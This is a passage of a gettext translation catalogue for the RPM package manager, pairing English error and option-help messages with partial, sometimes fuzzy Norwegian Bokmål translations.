msgid "region trailer: BAD, tag %d type %d offset %d count %d"
msgstr ""
#, c-format
msgid "region %d size: BAD, ril %d il %d rdl %d dl %d"
msgstr ""
#, c-format
msgid "region %d: tag number mismatch il %d ril %d dl %d rdl %d\n"
msgstr ""
#, c-format
msgid "hdr size(%d): BAD, read returned %d"
msgstr ""
msgid "hdr magic: BAD"
msgstr ""
#, c-format
msgid "hdr tags: BAD, no. of tags(%d) out of range"
msgstr ""
#, c-format
msgid "hdr data: BAD, no. of bytes(%d) out of range"
msgstr ""
#, c-format
msgid "hdr blob(%zd): BAD, read returned %d"
msgstr ""
#, c-format
msgid "sigh pad(%zd): BAD, read %zd bytes"
msgstr ""
msgid "signature "
msgstr ""
#, c-format
msgid "blob size(%d): BAD, 8 + 16 * il(%d) + dl(%d)"
msgstr ""
msgid "invalid field width"
msgstr ""
#, c-format
msgid "missing { after %%"
msgstr ""
#, c-format
msgid "missing } after %%{"
msgstr ""
msgid "empty tag format"
msgstr ""
msgid "empty tag name"
msgstr ""
#, c-format
msgid "unknown tag: \"%s\""
msgstr ""
msgid "] expected at end of array"
msgstr ""
msgid "unexpected ]"
msgstr ""
msgid "unexpected }"
msgstr ""
msgid "escaped char expected after \\"
msgstr ""
msgid "? expected in expression"
msgstr ""
msgid "{ expected after ? in expression"
msgstr ""
msgid "} expected in expression"
msgstr ""
msgid ": expected following ? subexpression"
msgstr ""
msgid "{ expected after : in expression"
msgstr ""
msgid "| expected at end of expression"
msgstr ""
msgid "array iterator used with different sized arrays"
msgstr ""
#, c-format
msgid "RPM v3 packages are deprecated: %s\n"
msgstr ""
#, c-format
msgid "failed to load macro file %s\n"
msgstr ""
#, c-format
msgid "arguments to --dbpath must begin with '/'\n"
msgstr ""
#, c-format
msgid ""
"%s: error: more than one --pipe specified (incompatible popt aliases?)\n"
msgstr ""
msgid "predefine MACRO with value EXPR"
msgstr ""
msgid "'MACRO EXPR'"
msgstr ""
msgid "define MACRO with value EXPR"
msgstr ""
msgid "undefine MACRO"
msgstr ""
msgid "MACRO"
msgstr ""
msgid "print macro expansion of EXPR"
msgstr ""
msgid "'EXPR'"
msgstr ""
msgid "Specify target platform"
msgstr ""
msgid "CPU-VENDOR-OS"
msgstr ""
msgid "read <FILE:...> instead of default file(s)"
msgstr ""
msgid "<FILE:...>"
msgstr ""
msgid "load a single macro file"
msgstr ""
msgid "<FILE>"
msgstr ""
msgid "don't enable any plugins"
msgstr ""
msgid "don't verify package digest(s)"
msgstr ""
msgid "don't verify database header(s) when retrieved"
msgstr ""
msgid "don't verify package signature(s)"
msgstr ""
msgid "send stdout to CMD"
msgstr ""
msgid "CMD"
msgstr ""
msgid "use ROOT as top level directory"
msgstr ""
msgid "ROOT"
msgstr ""
msgid "use database in DIRECTORY"
msgstr ""
msgid "DIRECTORY"
msgstr ""
msgid "display known query tags"
msgstr "vis kjente tagger for spørring"
msgid "display final rpmrc and macro configuration"
msgstr "vis endelig rpmrc og makrokonfigurasjon"
msgid "provide less detailed output"
msgstr "gi mindre detaljert info"
msgid "provide more detailed output"
msgstr "gi mer detaljert info"
msgid "print the version of rpm being used"
msgstr "skriv ut hvilken versjon av rpm som brukes"
msgid "debug payload file state machine"
msgstr ""
msgid "debug rpmio I/O"
msgstr "feilsøk rpmio I/U"
msgid "disable user namespace support"
msgstr ""
#, c-format
msgid "%s: option table misconfigured (%d)\n"
msgstr ""
msgid "exclude paths must begin with a /"
msgstr "ekskluderingssti må begynne med en /"
msgid "relocations must begin with a /"
msgstr "relokasjoner må begynne med en /"
msgid "relocations must contain a ="
msgstr "relokasjoner må inneholde et ="
msgid "relocations must have a / following the ="
msgstr "relokasjoner må ha et / etter ="
msgid "install all files, even configurations which might otherwise be skipped"
msgstr "installer alle filer, selv konfigurasjoner som ellers kan hoppes over"
msgid ""
"remove all packages which match <package> (normally an error is generated if "
"<package> specified multiple packages)"
msgstr ""
"fjern alle pakker som er lik <pakke> (normalt vil en feil genereres hvis "
"<pakke> spesifiserer flere pakker)"
msgid "relocate files in non-relocatable package"
msgstr ""
msgid "print dependency loops as warning"
msgstr ""
msgid "erase (uninstall) package"
msgstr "slett (avinstaller) pakke"
msgid "<package>+"
msgstr "<pakke>+"
#, fuzzy
msgid "do not install artifacts"
msgstr "ikke installer dokumentasjon"
msgid "do not install configuration files"
msgstr ""
msgid "do not install documentation"
msgstr "ikke installer dokumentasjon"
msgid "skip files with leading component <path> "
msgstr "hopp over filer med innledende komponent <sti> "
msgid "<path>"
msgstr "<sti>"
msgid "short hand for --replacepkgs --replacefiles"
msgstr "forkortning for --replacepkgs --replacefiles"
msgid "upgrade package(s) if already installed"
msgstr "oppgrader pakke(r) hvis allerede installert"
msgid "<packagefile>+"
msgstr "<pakkefil>+"
msgid "print hash marks as package installs (good with -v)"
msgstr "skriv ut skigarder etter som pakken installeres (nyttig med -v)"
msgid "don't verify package architecture"
msgstr "ikke verifiser pakkearkitektur"
msgid "don't verify package operating system"
msgstr "ikke verifiser operativsystem for pakken"
msgid "don't check disk space before installing"
msgstr "ikke sjekk diskplass før installasjon"
msgid "short hand for --ignorepayload --ignoresignature"
msgstr ""
msgid "install documentation"
msgstr "installer dokumentasjon"
msgid "install package(s)"
msgstr ""
msgid "update the database, but do not modify the filesystem"
msgstr "oppdater databasen, men ikke modifiser filsystemet"
msgid "do not verify package dependencies"
msgstr "ikke verifiser pakkeavhengigheter"
msgid "don't verify digest of files"
msgstr ""
msgid "don't verify digest of files (obsolete)"
msgstr ""
msgid "don't install file security contexts"
msgstr ""
msgid "don't install file capabilities"
msgstr ""
msgid "do not reorder package installation to satisfy dependencies"
msgstr "ikke ordne pakkeinstallasjon for å tilfredsstille avhengigheter"
msgid "do not execute package scriptlet(s)"
msgstr "ikke kjør pakkespesifikke skriptlet"
#, c-format
msgid "do not execute %%pre scriptlet (if any)"
msgstr "ikke kjør noen %%pre skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%post scriptlet (if any)"
msgstr "ikke kjør %%post skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%preun scriptlet (if any)"
msgstr "ikke kjør %%preun skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%postun scriptlet (if any)"
msgstr "ikke kjør %%postun skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%pretrans scriptlet (if any)"
msgstr ""
#, c-format
msgid "do not execute %%posttrans scriptlet (if any)"
msgstr ""
msgid "do not execute any scriptlet(s) triggered by this package"
msgstr "Ikke kjør noen skriptlets som utløses av denne pakken"
#, c-format
msgid "do not execute any %%triggerprein scriptlet(s)"
msgstr "ikke kjør %%triggerprein skriptlets"
#, c-format
msgid "do not execute any %%triggerin scriptlet(s)"
msgstr "ikke kjør %%triggerin skriptlets"
#, c-format
msgid "do not execute any %%triggerun scriptlet(s)"
msgstr "ikke kjør %%triggerun skriplets"
#, c-format
msgid "do not execute any %%triggerpostun scriptlet(s)"
msgstr "ikke kjør %%triggerpostun skriptlets"
msgid ""
"upgrade to an old version of the package (--force on upgrades does this "
"automatically)"
msgstr ""
"oppgrader til en gammel versjon av pakken (--force ved oppgraderinger gjør "
"dette automatisk)"
msgid "print percentages as package installs"
msgstr "skriv ut prosentvis fremgang etter som pakken installeres"
msgid "relocate the package to <dir>, if relocatable"
msgstr "omplasser pakken til <kat>, hvis den er omplasserbar"
msgid "<dir>"
msgstr "<kat>"
msgid "relocate files from path <old> to <new>"
msgstr "omplasser filer fra sti <gml> til <ny>"
msgid "<old>=<new>"
msgstr "<gml>=<ny>"
msgid "ignore file conflicts between packages"
msgstr ""
msgid "reinstall if the package is already present"
msgstr "reinstaller selv om pakken allerede er installert"
msgid "don't install, but tell if it would work or not"
msgstr "ikke installer, men si ifra om det ville virke eller ikke"
msgid "upgrade package(s)"
msgstr "oppgrader pakke(r)"
msgid "reinstall package(s)"
msgstr ""
msgid "query/verify all packages"
msgstr "spør/verifiser alle pakker"
msgid "rpm checksig mode"
msgstr ""
msgid "query/verify package(s) owning file"
msgstr "spør/verifiser pakke(r) som eier fil"
msgid "query/verify package(s) in group"
msgstr "spør/verifiser pakke(r) i gruppe"
msgid "query/verify a package file"
msgstr ""
msgid "query/verify package(s) with package identifier"
msgstr ""
msgid "query/verify package(s) with header identifier"
msgstr ""
msgid "rpm query mode"
msgstr "rpm spørremodus"
msgid "query/verify a header instance"
msgstr ""
msgid "query/verify package(s) from install transaction"
msgstr ""
msgid "query the package(s) triggered by the package"
msgstr "spør pakker utløst av <pakke>"
msgid "rpm verify mode"
msgstr ""
msgid "query/verify the package(s) which require a dependency"
msgstr "spør etter pakker som trenger <funk> funksjonalitet"
msgid "query/verify the package(s) which obsolete a dependency"
msgstr ""
msgid "query/verify the package(s) which provide a dependency"
msgstr "spør etter pakker som tilbyr <funk> funksjonalitet"
msgid "query/verify the package(s) which recommends a dependency"
msgstr ""
msgid "query/verify the package(s) which suggests a dependency"
msgstr ""
msgid "query/verify the package(s) which supplements a dependency"
msgstr ""
msgid "query/verify the package(s) which enhances a dependency"
msgstr ""
msgid "do not glob arguments"
msgstr ""
msgid "do not process non-package files as manifests"
msgstr ""
msgid "only include configuration files"
msgstr ""
msgid "only include documentation files"
msgstr ""
msgid "only include license files"
msgstr ""
msgid "only include artifact files"
msgstr ""
#, c-format
msgid "exclude %%ghost files"
msgstr ""
#, c-format
msgid "exclude %%config files"
msgstr ""
#, c-format
msgid "exclude %%artifact files"
msgstr ""
msgid "dump basic file information"
msgstr ""
msgid "list files in package"
msgstr ""
msgid "display the states of the listed files"
msgstr ""
msgid "don't verify size of files"
msgstr "ikke verifiser størrelse på filer"
msgid "don't verify symlink path of files"
msgstr "ikke verifiser sti til symbolske lenker for filer"
msgid "don't verify owner of files"
msgstr "ikke verifiser eier av filer"
msgid "don't verify group of files"
msgstr "ikke verifiser gruppe for filer"
msgid "don't verify modification time of files"
msgstr "ikke verifiser endringsdato for filer"
msgid "don't verify mode of files"
msgstr "ikke verifiser modus for filer"
msgid "don't verify file security contexts"
msgstr ""
msgid "don't verify capabilities of files"
msgstr ""
msgid "don't verify files in package"
msgstr "ikke verifiser filer i pakke"
msgid "don't verify package dependencies"
msgstr "ikke verifiser pakkeavhengigheter"
msgid "don't execute verify script(s)"
msgstr ""
#, c-format
msgid "Missing rpmlib features for %s:\n"
msgstr ""
msgid "source package expected, binary found\n"
msgstr "kildepakke forventet, binær funnet\n"
msgid "source package contains no .spec file\n"
msgstr "kildepakke inneholder ikke en .spec-fil\n"
#, c-format
msgid "unpacking of archive failed%s%s: %s\n"
msgstr ""
msgid " on file "
msgstr ""
#, c-format
msgid "incorrect format: %s\n"
msgstr "ukorrekt format: %s\n"
msgid "(contains no files)\n"
msgstr ""
msgid "normal "
msgstr "normal "
msgid "replaced "
msgstr "erstattet "
msgid "not installed "
msgstr "ikke installert"
msgid "net shared "
msgstr "delt via nett "
msgid "wrong color "
msgstr ""
msgid "(no state) "
msgstr "(ingen tilstand)"
#, c-format
msgid "(unknown %3d) "
msgstr "(ukjent %3d) "
msgid "package has not file owner/group lists\n"
msgstr ""
msgid "package has neither file owner or id lists\n"
msgstr "pakken har verken fileier eller id-lister\n"
#, c-format
msgid "group %s does not contain any packages\n"
msgstr "gruppe %s inneholder ingen pakker\n"
#, c-format
msgid "no package triggers %s\n"
msgstr "ingen pakke utløser %s\n"
#, c-format
msgid "malformed %s: %s\n"
msgstr ""
#, c-format
msgid "no package matches %s: %s\n"
msgstr ""
#, c-format
msgid "no package conflicts %s\n"
msgstr ""
#, c-format
msgid "no package obsoletes %s\n"
msgstr ""
#, c-format
msgid "no package requires %s\n"
msgstr "ingen pakke krever %s\n"
#, c-format
msgid "no package recommends %s\n"
msgstr ""
#, c-format
msgid "no package suggests %s\n"
msgstr ""
#, c-format
msgid "no package supplements %s\n"
msgstr ""
#, c-format
msgid "no package enhances %s\n"
msgstr ""
#, c-format
msgid "no package provides %s\n"
msgstr "ingen pakke gir %s\n"
#, c-format
msgid "file %s: %s\n"
msgstr "fil %s: %s\n"
#, c-format
msgid "file %s is not owned by any package\n"
msgstr "filen %s eies ikke av noen pakke\n"
#, c-format
msgid "invalid package number: %s\n"
msgstr "ugyldig pakkenummer: %s\n"
#, c-format
msgid "record %u could not be read\n"
msgstr ""
#, c-format
msgid "package %s is not installed\n"
msgstr "pakke %s er ikke installert\n"
#, c-format
msgid "unknown tag: \"%s\"\n"
msgstr ""
#, c-format
msgid "%s: key %d import failed.\n"
msgstr ""
#, c-format
msgid "%s: key %d not an armored public key.\n"
msgstr ""
#, c-format
msgid "%s: import read failed(%d).\n"
msgstr ""
#, c-format
msgid "Fread failed: %s"
msgstr ""
msgid "DIGESTS"
msgstr ""
msgid "digests"
msgstr ""
msgid "SIGNATURES"
msgstr ""
msgid "signatures"
msgstr ""
msgid "NOT OK"
msgstr "IKKE OK"
msgid "OK"
msgstr "OK"
#, c-format
msgid "%s: open failed: %s\n"
msgstr "%s: åpne feilet: %s\n"
#, c-format
msgid "Unable to open current directory: %m\n"
msgstr ""
#, c-format
msgid "%s: chroot directory not set\n"
msgstr ""
#, c-format
msgid "Unable to change root directory: %m\n"
msgstr ""
#, c-format
msgid "Unable to restore root directory: %m\n"
msgstr ""
#, c-format
msgid "Generating %d missing index(es), please wait...\n"
msgstr ""
#, c-format
msgid "cannot open %s index using %s - %s (%d)\n"
msgstr ""
msgid "no dbpath has been set\n"
msgstr ""
msgid "miFreeHeader: skipping"
msgstr ""
#, c-format
msgid "error(%d) storing record #%d into %s\n"
msgstr ""
#, c-format
msgid "%s: regexec failed: %s\n"
msgstr ""
#, c-format
msgid "%s: regcomp failed: %s\n"
msgstr ""
msgid "rpmdbNextIterator: skipping"
msgstr ""
#, c-format
msgid "rpmdb: damaged header #%u retrieved -- skipping.\n"
msgstr ""
#, c-format
msgid "%s: cannot read header at 0x%x\n"
msgstr ""
msgid "could not move new database in place\n"
msgstr ""
#, c-format
msgid "could also not restore old database from %s\n"
msgstr ""
#, c-format
msgid "replace files in %s with files from %s to recover\n"
msgstr ""
#, c-format
msgid "Could not get public keys from %s\n"
msgstr ""
#, c-format
msgid "could not delete old database at %s\n"
msgstr ""
msgid "no dbpath has been set"
msgstr ""
#, c-format
msgid "failed to create directory %s: %s\n"
msgstr ""
#, c-format
msgid "header #%u in the database is bad -- skipping.\n"
msgstr ""
#, c-format
msgid "cannot add record originally at %u\n"
msgstr ""
msgid "failed to rebuild database: original database remains in place\n"
msgstr ""
msgid "failed to replace old database with new database!\n"
msgstr ""
msgid "NO "
msgstr "NEI"
msgid "YES"
msgstr "JA"
msgid "PreReq:, Provides:, and Obsoletes: dependencies support versions."
msgstr ""
msgid "file name(s) stored as (dirName,baseName,dirIndex) tuple, not as path."
msgstr ""
msgid "package payload can be compressed using bzip2."
msgstr ""
msgid "package payload can be compressed using xz."
msgstr ""
msgid "package payload can be compressed using lzma."
msgstr ""
msgid "package payload file(s) have \"./\" prefix."
msgstr ""
msgid "package name-version-release is not implicitly provided."
msgstr ""
msgid "header tags are always sorted after being loaded."
msgstr ""
msgid "the scriptlet interpreter can use arguments from header."
msgstr ""
msgid "a hardlink file set may be installed without being complete."
msgstr ""
msgid "package scriptlets may access the rpm database while installing."
msgstr ""
msgid "internal support for lua scripts."
msgstr ""
msgid "file digest algorithm is per package configurable"
msgstr ""
msgid "support for POSIX.1e file capabilities"
msgstr ""
msgid "package scriptlets can be expanded at install time."
msgstr ""
msgid "dependency comparison supports versions with tilde."
msgstr ""
msgid "dependency comparison supports versions with caret."
msgstr ""
msgid "support files larger than 4GB"
msgstr ""
msgid "support for rich dependencies."
msgstr ""
msgid "support for dynamic buildrequires."
msgstr ""
msgid "package payload can be compressed using zstd."
msgstr ""
#, c-format
msgid "Unknown rich dependency op '%.*s'"
msgstr ""
msgid "Name required"
msgstr ""
msgid "Illegal ops in with/without"
msgstr ""
msgid "Illegal context for 'unless', please use 'or' instead"
msgstr ""
msgid "Illegal context for 'if', please use 'and' instead"
msgstr ""
msgid "Rich dependency does not start with '('"
msgstr ""
msgid "Missing argument to rich dependency op"
msgstr ""
msgid "Empty rich dependency"
msgstr ""
#, c-format
msgid "Unterminated rich dependency: %s"
msgstr ""
msgid "Cannot chain different ops"
msgstr ""
msgid "Can only chain and/or/with ops"
msgstr ""
msgid "Junk after rich dependency"
msgstr ""
#, c-format
msgid "user %s does not exist - using %s\n"
msgstr ""
#, c-format
msgid "group %s does not exist - using %s\n"
msgstr ""
#, c-format
msgid "Wrong number of entries for tag %s: %u found but %u expected.\n"
msgstr ""
#, c-format
msgid "Malformed data for tag %s: %u bytes found but %lu expected.\n"
msgstr ""
msgid "Bad magic"
msgstr "Ugyldig magi"
msgid "Bad/unreadable header"
msgstr "Ugyldig/ulesbar header"
msgid "Header size too big"
msgstr "For stor header"
msgid "File too large for archive"
msgstr ""
msgid "Unknown file type"
msgstr "Ukjent filtype"
msgid "Missing file(s)"
msgstr ""
msgid "Digest mismatch"
msgstr ""
msgid "Internal error"
msgstr "Intern feil"
msgid "Archive file not in header"
msgstr ""
msgid "File from package already exists as a directory in system"
msgstr ""
msgid " failed - "
msgstr " feilet - "
#, c-format
msgid "%s: (error 0x%x)"
msgstr ""
#, c-format
msgid "open of %s failed: %s\n"
msgstr "feil under åpning av %s: %s\n"
#, c-format
msgid "Max level of manifest recursion exceeded: %s\n"
msgstr ""
#, c-format
msgid "%s: not an rpm package (or package manifest)\n"
msgstr ""
#, c-format
msgid "Updating / installing...\n"
msgstr ""
#, c-format
msgid "Cleaning up / removing...\n"
msgstr ""
msgid "Preparing..."
msgstr "Forbereder..."
msgid "Verifying..."
msgstr ""
msgid "Preparing packages..."
msgstr ""
msgid "Verifying packages..."
msgstr ""
msgid "Failed dependencies:\n"
msgstr ""
#, c-format
msgid "%s: not an rpm package (or package manifest): %s\n"
msgstr ""
#, c-format
msgid "%s cannot be installed\n"
msgstr ""
#, c-format
msgid "Retrieving %s\n"
msgstr "Henter %s\n"
#, c-format
msgid "skipping %s - transfer failed\n"
msgstr ""
#, c-format
msgid "package %s is not relocatable\n"
msgstr ""
#, c-format
msgid "error reading from file %s\n"
msgstr "feil under lesing fra fil %s\n"
#, c-format
msgid "\"%s\" specifies multiple packages:\n"
msgstr ""
#, c-format
msgid "cannot open %s: %s\n"
msgstr "kan ikke åpne %s: %s\n"
#, c-format
msgid "Installing %s\n"
msgstr "Installerer %s\n"
msgid "not an rpm package"
msgstr ""
msgid "illegal signature type"
msgstr ""
msgid "unsupported RPM package version"
msgstr ""
#, c-format
msgid "read failed: %s (%d)\n"
msgstr "lesing feilet: %s (%d)\n"
msgid "not an rpm package\n"
msgstr ""
#, c-format
msgid "can't create %s lock on %s (%s)\n"
msgstr ""
#, c-format
msgid "waiting for %s lock on %s\n"
msgstr ""
#, c-format
msgid "Failed to dlopen %s %s\n"
msgstr ""
#, c-format
msgid "Failed to resolve symbol %s: %s\n"
msgstr ""
#, c-format
msgid "Plugin %%__%s_%s not configured\n"
msgstr ""
#, c-format
msgid "Plugin %s not loaded\n"
msgstr ""
msgid "different"
msgstr ""
#, c-format
msgid "package %s is intended for a %s architecture"
msgstr ""
#, c-format
msgid "package %s is intended for a %s operating system"
msgstr ""
#, c-format
msgid "package %s is already installed"
msgstr "pakke %s er allerede installert"
#, fuzzy, c-format
msgid "package %s is not installed"
msgstr "pakke %s er ikke installert\n"
#, c-format
msgid "path %s in package %s is not relocatable"
msgstr ""
#, c-format
msgid "file %s conflicts between attempted installs of %s and %s"
msgstr ""
#, c-format
msgid "file %s from install of %s conflicts with file from package %s"
msgstr ""
#, c-format
msgid "package %s (which is newer than %s) is already installed"
msgstr ""
#, c-format
msgid ""
"installing package %s needs %<PRIu64>%cB more space on the %s filesystem"
msgstr ""
#, c-format
msgid "installing package %s needs %<PRIu64> more inodes on the %s filesystem"
msgstr ""
#, c-format
msgid "%s is needed by %s%s"
msgstr ""
msgid "(installed) "
msgstr ""
#, c-format
msgid "%s conflicts with %s%s"
msgstr ""
#, c-format
msgid "%s is obsoleted by %s%s"
msgstr ""
#, c-format
msgid "package %s does not verify: %s"
msgstr ""
#, c-format
msgid "unknown error %d encountered while manipulating package %s"
msgstr ""
#, c-format
msgid "missing second ':' at %s:%d\n"
msgstr "mangler andre ':' ved %s:%d\n"
#, c-format
msgid "missing architecture name at %s:%d\n"
msgstr "manglende navn på arkitektur ved %s:%d\n"
#, c-format
msgid "Incomplete data line at %s:%d\n"
msgstr "Ukomplett datalinje ved %s:%d\n"
#, c-format
msgid "Too many args in data line at %s:%d\n"
msgstr "For mange argumenter i datalinje ved %s:%d\n"
#, c-format
msgid "Bad arch/os number: %s (%s:%d)\n"
msgstr ""
#, c-format
msgid "Incomplete default line at %s:%d\n"
msgstr "Ukomplett standardlinje ved %s:%d\n"
#, c-format
msgid "Too many args in default line at %s:%d\n"
msgstr ""
#, c-format
msgid "missing ':' (found 0x%02x) at %s:%d\n"
msgstr "mangler ':' (fant 0x%02x) ved %s:%d\n"
#, c-format
msgid "missing argument for %s at %s:%d\n"
msgstr "manglende argument for %s ved %s:%d\n"
#, c-format
msgid "cannot open %s at %s:%d: %m\n"
msgstr ""
#, c-format
msgid "missing architecture for %s at %s:%d\n"
msgstr "manglende arkitektur for %s ved %s:%d\n"
#, c-format
msgid "bad option '%s' at %s:%d\n"
msgstr "ugyldig flagg '%s' ved %s:%d\n"
msgid "Failed to read auxiliary vector, /proc not mounted?\n"
msgstr ""
#, c-format
msgid "Unknown system: %s\n"
msgstr ""
#, c-format
msgid "Please contact %s\n"
msgstr ""
#, c-format
msgid "Unable to open %s for reading: %m.\n"
msgstr ""
msgid "failed to register exit handler"
msgstr ""
msgid "No exec() called after fork() in lua scriptlet\n"
msgstr ""
#, c-format
msgid "Unable to restore current directory: %m"
msgstr ""
msgid "<lua> scriptlet support not built in\n"
msgstr ""
#, c-format
msgid "failed to exec scriptlet interpreter %s: %s\n"
msgstr ""
#, c-format
msgid "Couldn't create temporary file for %s: %s\n"
msgstr ""
#, c-format
msgid "Couldn't duplicate file descriptor: %s: %s\n"
msgstr ""
#, c-format
msgid "Fwrite failed: %s"
msgstr ""
#, c-format
msgid "%s scriptlet failed, waitpid(%d) rc %d: %s\n"
msgstr ""
#, c-format
msgid "%s scriptlet failed, signal %d\n"
msgstr ""
#, c-format
msgid "%s scriptlet failed, exit status %d\n"
msgstr ""
msgid "Unknown format"
msgstr ""
msgid "install"
msgstr ""
msgid "erase"
msgstr ""
msgid "rpmdb"
msgstr ""
#, c-format
msgid "cannot open Packages database in %s\n"
msgstr "kan ikke åpne pakkedatabase i %s\n"
#, c-format
msgid "extra '(' in package label: %s\n"
msgstr ""
#, c-format
msgid "missing '(' in package label: %s\n"
msgstr ""
#, c-format
msgid "missing ')' in package label: %s\n"
msgstr ""
#, c-format
msgid "%s: reading of public key failed.\n"
msgstr ""
#, c-format
msgid "invalid package verify level %s\n"
msgstr ""
msgid "transaction"
msgstr ""
#, c-format
msgid "%s tag %u: invalid type %u"
msgstr ""
#, c-format
msgid "%s: tag %u: invalid count %u"
msgstr ""
#, c-format
msgid "%s tag %u: invalid data %p (%u)"
msgstr ""
#, c-format
msgid "%s tag %u: invalid size %u"
msgstr ""
#, c-format
msgid "%s tag %u: invalid OpenPGP signature"
msgstr ""
#, c-format
msgid "%s: tag %u: invalid hex"
msgstr ""
#, c-format
msgid "%s%s%s %s"
msgstr ""
msgid "digest"
msgstr ""
#, c-format
msgid "%s%s"
msgstr ""
msgid "signature"
msgstr ""
msgid "header"
msgstr ""
msgid "package"
msgstr ""
msgid "Header "
msgstr ""
msgid "Payload "
msgstr ""
msgid "Unable to reload signature header.\n"
msgstr ""
msgid "no signature"
msgstr ""
msgid "no digest"
msgstr ""
msgid "skipped"
msgstr ""
msgid "failed"
msgstr ""
msgid "no state"
msgstr ""
msgid "unknown state"
msgstr ""
#, c-format
msgid "missing %c %s"
msgstr ""
#, c-format
msgid "Unsatisfied dependencies for %s:\n"
msgstr ""
#, c-format
msgid "Unable to reset nice value: %s"
msgstr ""
#, c-format
msgid "Unable to reset I/O priority: %s"
msgstr ""
#, fuzzy
msgid "syntax error while parsing =="
msgstr "syntaksfeil under lesing av ==\n"
#, fuzzy
msgid "syntax error while parsing &&"
msgstr "syntaksfeil under lesing av &&\n"
#, fuzzy
msgid "syntax error while parsing ||"
msgstr "syntaksfeil under lesing av ||\n"
msgid "macro expansion returned a bare word, please use \"...\""
msgstr ""
msgid "macro expansion did not return an integer"
msgstr ""
#, c-format
msgid "expanded string: %s\n"
msgstr ""
#, fuzzy
msgid "unterminated string in expression"
msgstr "syntaksfeil i uttrykk\n"
msgid "invalid version"
msgstr ""
msgid "bare words are no longer supported, please use \"...\""
msgstr ""
#, fuzzy
msgid "parse error in expression"
msgstr "feil under lesing av uttrykk\n"
#, fuzzy
msgid "unmatched ("
msgstr "ubalansert (\n"
#, fuzzy
msgid "- only on numbers"
msgstr "- kun på tall\n"
#, fuzzy
msgid "unexpected end of expression"
msgstr "uventet spørringskilde"
#, fuzzy
msgid "syntax error in expression"
msgstr "syntaksfeil i uttrykk\n"
#, fuzzy
msgid "types must match"
msgstr "typene må være like\n"
msgid "division by zero"
msgstr ""
#, fuzzy
msgid "* and / not supported for strings"
msgstr "* / ikke støttet for strenger\n"
#, fuzzy
msgid "- not supported for strings"
msgstr "- ikke støttet for strenger\n"
#, c-format
msgid "%3d>%*s(empty)\n"
msgstr ""
#, c-format
msgid "%3d<%*s(empty)\n"
msgstr ""
#, fuzzy, c-format
msgid "Failed to open shell expansion pipe for command: %s: %m \n"
msgstr "Kunne ikke åpne tar-rør: %m\n"
#, c-format
msgid "Macro %%%s has illegal name (%s)\n"
msgstr ""
#, c-format
msgid "Macro %%%s is a built-in (%s)\n"
msgstr ""
#, c-format
msgid "Macro %%%s has unterminated opts\n"
msgstr ""
#, c-format
msgid "Macro %%%s has unterminated body\n"
msgstr ""
#, c-format
msgid "Macro %%%s has empty body\n"
msgstr ""
#, c-format
msgid "Macro %%%s needs whitespace before body\n"
msgstr ""
#, c-format
msgid "Macro %%%s failed to expand\n"
msgstr ""
#, c-format
msgid "Macro %%%s defined but not used within scope\n"
msgstr ""
#, c-format
msgid "Unknown option %c in %s(%s)\n"
msgstr ""
#, c-format
msgid "no such macro: '%s'\n"
msgstr ""
msgid ""
"Too many levels of recursion in macro expansion. It is likely caused by "
"recursive macro declaration.\n"
msgstr ""
#, c-format
msgid "Unterminated %c: %s\n"
msgstr ""
#, c-format
msgid "A %% is followed by an unparseable macro\n"
msgstr ""
msgid "argument expected"
msgstr ""
#, fuzzy
msgid "unexpected argument"
msgstr "ventet spørringsformat"
#, c-format
msgid "======================== active %d empty %d\n"
msgstr ""
#, c-format
msgid "error creating temporary file %s: %m\n"
msgstr ""
#, c-format
msgid "File %s: %s\n"
msgstr "Fil %s: %s\n"
#, c-format
msgid "File %s is smaller than %u bytes\n"
msgstr "Fil %s er mindre enn %u bytes\n"
msgid "[none]"
msgstr ""
msgid "(no error)"
msgstr ""
msgid "fatal error: "
msgstr "fatal feil: "
msgid "error: "
msgstr "feil: "
msgid "warning: "
msgstr "advarsel: "
msgid "Error writing to log"
msgstr ""
#, c-format
msgid "invalid syntax in lua scriptlet: %s\n"
msgstr ""
#, c-format
msgid "invalid syntax in lua script: %s\n"
msgstr ""
#, c-format
msgid "lua script failed: %s\n"
msgstr ""
#, c-format
msgid "invalid syntax in lua file: %s\n"
msgstr ""
#, c-format
msgid "lua hook failed: %s\n"
msgstr ""
#, c-format
msgid "memory alloc (%u bytes) returned NULL.\n"
msgstr ""
#, c-format
msgid "Unsupported version of key: V%d\n"
msgstr ""
#, c-format
msgid "V%d %s/%s %s, key ID %s"
msgstr ""
msgid "(none)"
msgstr ""
#, c-format
msgid "exiting on signal %d from pid %d\n"
msgstr ""
#, c-format
msgid "%s: Fwrite failed: %s\n"
msgstr "%s: Fwrite feilet: %s\n"
#, c-format
msgid "%s: Fread failed: %s\n"
msgstr "%s: Fread feilet: %s\n"
#, c-format
msgid "%s: Fflush failed: %s\n"
msgstr ""
msgid "Unsupported PGP signature\n"
msgstr ""
#, c-format
msgid "Unsupported PGP hash algorithm %u\n"
msgstr ""
#, c-format
msgid "Unsupported PGP pubkey algorithm %u\n"
msgstr ""
#, fuzzy, c-format
msgid "Could not create pipe for signing: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, fuzzy, c-format
msgid "Could not set GPG_TTY to stdin: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, c-format
msgid "Could not exec %s: %s\n"
msgstr ""
#, fuzzy, c-format
msgid "Could not open pipe for writing: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
msgid "Could not write to pipe\n"
msgstr ""
#, c-format
msgid "Could not read from file %s: %s\n"
msgstr ""
#, c-format
msgid "gpg exec failed (%d)\n"
msgstr ""
msgid "gpg failed to write signature\n"
msgstr ""
msgid "unable to read the signature\n"
msgstr ""
msgid "file signing support not built in\n"
msgstr ""
#, c-format
msgid "%s: rpmReadSignature failed: %s"
msgstr ""
#, c-format
msgid "%s: headerRead failed: %s\n"
msgstr ""
msgid "Cannot sign RPM v3 packages\n"
msgstr ""
#, c-format
msgid "%s already contains identical signature, skipping\n"
msgstr ""
#, c-format
msgid "%s: rpmWriteSignature failed: %s\n"
msgstr "%s: rpmWriteSignature feilet: %s\n"
msgid "rpmMkTemp failed\n"
msgstr ""
#, c-format
msgid "%s: writeLead failed: %s\n"
msgstr "%s: writeLead feilet: %s\n"
#, c-format
msgid "replacing %s failed: %s\n"
msgstr ""
msgid "sign_hash failed\n"
msgstr ""
msgid "File digest algorithm id is invalid"
msgstr ""
msgid "signFile failed\n"
msgstr ""
msgid "headerPutString failed\n"
